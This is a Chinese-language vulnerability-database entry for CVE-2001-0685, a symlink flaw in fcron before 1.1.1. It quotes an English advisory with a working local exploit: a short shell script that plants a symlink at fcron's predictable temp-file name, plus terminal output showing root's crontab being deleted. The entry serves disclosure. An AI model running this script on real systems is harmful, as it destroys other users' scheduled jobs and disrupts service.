Thibault Godouet Fcron计时文件受到威胁

Thibault Godouet Fcron计时文件受到威胁

漏洞ID 1106372 漏洞类型 未知
发布时间 2001-06-07 更新时间 2005-05-02
图片[1]-Thibault Godouet Fcron计时文件受到威胁-安全小百科CVE编号 CVE-2001-0685
图片[2]-Thibault Godouet Fcron计时文件受到威胁-安全小百科CNNVD-ID CNNVD-200109-065
漏洞平台 Unix CVSS评分 2.6
|漏洞来源
https://www.exploit-db.com/exploits/20905
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200109-065
|漏洞详情
ThibaultGodouetFcron之前1.1.1版本存在漏洞。本地用户可以借助fcrontab临时文件上的链接攻击腐化另一个用户的计时任务文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/2835/info

FCron is an implementation of the popular UNIX 'cron' utility that runs user-specified programs at periodic scheduled times.

fcron is vulnerable to symbolic link attacks.

It is possible for an attacker to anticipate the expected name of an fcron tempfile. Attackers can create a symbolic link with an anticipated filename pointing to files on the system writable by the fcron group. This could allow an attacker to corrupt another user's crontab file, interfering with scheduled events and potentially creating a denial of service.

In addition, the ability to cause deletion of user crontabs has been demonstrated by the discoverer.

How to repeat:

1. Install a crontab, for example for the root user:

root# ls -l /var/spool/fcron/
total 0
root# echo '0 0 * * * echo test' | fcrontab -
09:53:00 installing file /tmp/fcrontab.27301 for user root
Modifications will be taken into account right now.
root# ls -l /var/spool/fcron/
total 2
-rw------- 1 root root 110 May 7 09:53 root
-rw------- 1 root fcron 20 May 7 09:53 root.orig


2. As a normal user write and execute a script:

uwe$ cat ~/x
#! /bin/sh
ln -s /var/spool/fcron/rm.root /tmp/fcrontab.$$
exec fcrontab - <<EOF
* * * * * false
EOF
uwe$ ./x
09:55:55 installing file /tmp/fcrontab.27536 for user uwe
09:55:55 User uwe can't read file "/tmp/fcrontab.27536": Permission denied

3. As root look into the fcron spool directory:

root# ls -l /var/spool/fcron/
total 3
-rw-r----- 1 uwe fcron 16 May 7 09:55 rm.root
-rw------- 1 root root 110 May 7 09:53 root
-rw------- 1 root fcron 20 May 7 09:53 root.orig

4. As the normal user edit your crontab:

uwe$ echo '* * * * * true' | fcrontab -
09:59:15 installing file /tmp/fcrontab.27543 for user uwe
Modifications will be taken into account at 10h00.

5. As root wait up to a minute and look into the fcron spool directory:

# ls -l /var/spool/fcron/
total 3
-rw------- 1 root fcron 20 May 7 09:53 root.orig
-rw------- 1 root root 102 May 7 09:59 uwe
-rw-r----- 1 fcron fcron 15 May 7 09:59 uwe.orig

6. Root's crontab is gone, look into your backups.
|参考资料

来源:BID
名称:2835
链接:http://www.securityfocus.com/bid/2835
来源:BUGTRAQ
名称:20010228fcron0.9.5isvulnerabletoasymlinkattack
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=98339581702282&w;=2
来源:fcron.free.fr
链接:http://fcron.free.fr/CHANGES.html
来源:XF
名称:fcron-tmpfile-symlink(7127)
链接:http://xforce.iss.net/static/7127.php

相关推荐: Cisco PIX Firewall破译密码漏洞

Cisco PIX Firewall破译密码漏洞 漏洞ID 1203759 漏洞类型 未知 发布时间 2002-10-04 更新时间 2002-10-04 CVE编号 CVE-2002-0954 CNNVD-ID CNNVD-200210-211 漏洞平台 N…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享